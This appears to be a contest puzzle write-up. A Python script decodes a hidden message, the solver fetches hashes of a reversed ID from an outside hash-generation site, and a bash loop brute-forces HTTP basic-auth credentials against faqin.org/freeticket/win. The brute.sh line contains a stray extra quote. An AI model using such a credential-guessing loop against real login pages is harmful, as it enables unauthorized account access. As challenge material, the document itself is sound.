 0w1p1E1p2v0w1z1q180w1z1q1a0w1z1q1b0w1F1u1n170w202l2j2h2u0w1F2q2h2i2u2x0w1E2l2s2h1z1q0w
 232k2l2u2o2s2r2r2o0w1u2d2y2d2o0w2r2u0w2d2q2r2w2k2h2u0w2v2w2r2s0w202u2B0w2w2k2l2v0w2k2d
 2v2k0w2z2l2w2k0w2B2r2x2u0w1v1q0w2w2r0w2h2v2f2d2s2h0w2i2u2r2p0w2w2k2h0w2p2d2w2u2l2A0w2d
 2q2g0w2z2l2q0w2d0w2i2u2h2h0w2w2l2f2n2h2w0w2i2r2u0w2w2k2h0w1s1n1D2l2q0w1p2r2q2j2u2h2v2v
 </pre>
...

# cat crypto.py
n = []
n.append('1222220222201102202220222220222220222201222')
n.append('2220222022222202222022222222202220222202222')
n.append('0111201110111011101111022222012222201222110')
n.append('2222222220122220220222222202222022202222022')
n.append('2202222022220110220222222022220222022222202')
n.append('2202220202222022222202220222011122012222222')

l = []
l.append('qlylghwBrxuwvqwlqwwzrwhtxdowsduwvwvwrswEhyh')
l.append('uvhwwkhwvwulqjwvwrswfdofxodwhwwkhwkdvkwzlwk')
l.append('wpEpvwzq8wzqawzqbwFun7w0ljhuwFqhiuxwElshzqw')
l.append('3kluosrrowudydowruwdqrwkhuwvwrsw0uBwwklvwkd')
l.append('vkwzlwkwBrxuwvqwwrwhvfdshwiurpwwkhwpdwulAwd')
l.append('qgwzlqwdwiuhhwwlfnhwwiruwwkhwsnDlqwprqjuhvv')

for i in xrange(0, 6):
  s = ''
  for j in xrange(0, len(l[i])):
    if  n[i][j] == '0':
      result = chr(ord(l[i][j]) - 87)
    elif n[i][j] == '1':
      c = l[i][j]
      if c.isdigit():
        result = chr(ord(l[i][j]) - 6)
      elif c.islower():
        result = chr(ord(l[i][j]) - 45)
      else:
        result = chr(ord(l[i][j]) + 13)
    elif n[i][j] == '2':
      c = l[i][j]
      if c.isdigit():
        result = chr(ord(l[i][j]) + 36)
      elif c.islower():
        result = chr(ord(l[i][j]) - 3)
      else:
        result = chr(ord(l[i][j]) + 55)
    #print n[i][j], l[i][j], result
    s += result
  print s

# python crypto.py
Divide your ID in two equal parts stop Reve
rse the string stop calculate the hash with
 CRCs MD2 MD4 MD5 SHA1 Tiger Snefru RipeMD
Whirlpool Haval or another stop Try this ha
sh with your ID to escape from the matrix a
nd win a free ticket for the FAQin Congress

# input=`echo -n $id | cut -c 1-16 | rev`
# curl --silent --data "input=$input" http://www.nitrxgen.net/hashgen/ | grep "\"exhr\"" |  awk -F '>' '{print $3}' | awk -F '<' '{print $1}' > /tmp/hashes.txt

# cat brute.sh
#!/bin/bash

id="$1"

while read hash; do
  result="`curl --user "$id:$hash" http://faqin.org/freeticket/win 2>&1 | grep -e '401 Unauthorized'`""
  if [ "$result" == "" ]; then
   echo $hash
   exit
  fi
done < /tmp/hashes.txt

# ./brute.sh $id
md4 hash